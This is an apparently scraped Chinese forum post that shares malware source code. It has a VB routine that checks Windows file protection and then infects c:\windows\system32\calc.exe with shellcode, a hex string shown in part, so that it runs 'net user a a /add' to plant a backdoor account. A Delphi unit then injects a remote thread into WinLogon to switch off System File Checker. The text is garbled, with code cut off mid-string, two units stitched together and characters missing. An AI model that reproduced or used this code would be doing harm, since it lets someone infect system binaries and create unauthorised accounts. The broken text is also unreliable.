1、不发表任何意见。现在呢,当然是把源码开出来啦。当然也不是我写的啦,呵呵。vbgood早有人写了的。不过他那个没加去除文件保护。顺便把这个加上去,呵呵。Option ExplicitPrivate Declare Function SfcIsFileProtected Lib “sfc_os.dll“ Alias “#5“ _(ByVal dwUnknown1 As Long, ByVal lpszFile As Long, ByVal dwUnknown2 As Long) As LongPrivate Sub Command1_Click()On Error GoTo 10Dim szFil
2、e As StringszFile = “c:windowssystem32sethc.exe“ + vbNullCharIf SfcIsFileProtected(0, StrPtr(szFile), -1) = 0 ThenInfectPE “c:windowssystem32calc.exe“, “cmd /c net user a a /add“ElseMsgBox “xx“End IfEnd SubPublic Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As LongDim
3、 i As Long, p As Long, q As Long, sHex As StringOn Error GoTo ERR: 设置错误陷坑感染的ShellcodesHex = “605583EC408BEC5564A1300000008B400C8B701CAD8B78088B473C8B54077803D78B4A188B5A2003“ interfaceusesWindows, SysUtils, WinLogonProcess;Function CloseSFC():Integer;implementationprocedure Root(VOID : Pointer); std
4、call; forward;procedure EndRoot(); forward;function FixedPChar(const Value : PChar) : PChar;forward;typeTLoadLibraryA = function(lpLibFileName : PAnsiChar) : HMODULE; stdcall;TGetProcAddress = function(hModule : HMODULE; lpProcName : LPCSTR) : FARPROC; stdcall;typeTFuncs = recordLoadLibraryA : TLoad
5、LibraryA;GetProcAddress : TGetProcAddress;end;function Init() : TFuncs; forward;/远线程代码开始处procedure Root(VOID : Pointer); stdcall;varFuncs : TFuncs;hSFC : Cardinal;_closeSFC : procedure(); stdcall;beginFuncs := Init();hSFC := Funcs.LoadLibraryA(FixedPChar(sfc.dll);_closeSFC := Funcs.GetProcAddress(hS
6、FC, PChar($2);_closeSFC();end;/修正指针常量在内存中的偏 function FixedPointer(const Value : Pointer) : Pointer;labelsign;varV, K : Cardinal;beginasmcall next /sign:next: pop eax /把EIP 出 Pmov K, eaxmov V, offset nextend;Result := Pointer(K - V + Cardinal(Value);end;/修正PChar常量在内存中的偏 Delphi 的程 有个 点. 常量 a:=abc 中的ab
7、c存 在代码段中.在 现 的 的 . 用的 . 我 的代码 不 定,我 把 的 行修正.Delphi的这个 ,Delphi是在 写currency1代码中最方便的“了.function FixedPChar(const Value : PChar) : PChar;beginResult := FixedPointer(Value);end;/Kernal32.DLL的 .用了PEB的fiflfunction GetK32Addr : Cardinal;asmmov eax,fs:$30mov eax,eax + $0cmov esi,eax + $1clodsdmov eax,eax+$08
8、 /这个 eax中保存的是k32的 了end;/ 是.这个 ”API没有定. 现.function StrSame(A, B : PChar) : Boolean;beginResult := True;if Integer(A) = Integer(B) thenbeginExit;end;while True dobeginif (A Cardinal(S) thenfor I := count - 1 downto 0 doDI := SIelsefor I := 0 to count - 1 doDI := SI;end;/ GetProcAddress的 现.function _Ge
9、tProcAddress(Module : Cardinal; ProcessName : PChar) : Pointer;varExportName : pChar;Address : Cardinal;J : Cardinal;ImageDosHeader : PImageDosHeader;ImageNTHeaders : PImageNTHeaders;ImageExportDirectory : PImageExportDirectory;beginImageDosHeader := Pointer(Module);ImageNTHeaders := Pointer(Module
10、+ ImageDosHeader._lfanew);ImageExportDirectory := Pointer(ImageNtHeaders.OptionalHeader.DataDirectoryIMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress + Module);J := 0;Address := 0;repeatExportName := Pointer(Cardinal(Pointer(Cardinal(ImageExportDirectory.AddressOfNames) + Module + J * 4) + Module);if Str
11、Same(ProcessName, ExportName) thenAddress := Cardinal(Pointer(Word(Pointer(J shl 1 + Cardinal(ImageExportDirectory.AddressOfNameOrdinals) + Module) and$0000FFFF shl 2 + Cardinal(ImageExportDirectory.AddressOfFunctions)+ Module) + Module;Inc(J);until (Address = 0;end;/WinLogon程的IDfunction GetWinLogon
12、PID() : Cardinal;constnSize = $2048 * sizeof(SYSTEM_PROCESS_INFORMATION);varProcessInfo, P : PSYSTEM_PROCESS_INFORMATION;rL : ULONG;states : NTSTATUS;offset : Integer;S : string;Dt : TDateTime;DDt : DWORD;LDt : TFileTime;WinLogon : WideString;beginResult := 0;GetMem(P, nSize);ProcessInfo := P;states
13、 := NtQuerySystemInformation(SystemProcessInformation,ProcessInfo,nSize,rL);if (not NT_SUCCESS(states) thenbeginFreeMem(ProcessInfo);Exit;end;Offset := 0;repeatProcessInfo := PSYSTEM_PROCESS_INFORMATION(DWORD(ProcessInfo) + Offset);WinLogon := ProcessInfo.ImageName.Buffer;if UpperCase(WinLogon) = WINLOGON.EXE thenbeginResult := ProcessInfo.UniqueProcessId;break;end;Offset := ProcessInfo.NextEntryOffset;until (Offset = 0);FreeMem(P);end;end.调用的 用WinLogonProcess, KillSFC 这 个单元,然 调用CloseSFC 了,当见 ,不错的 。
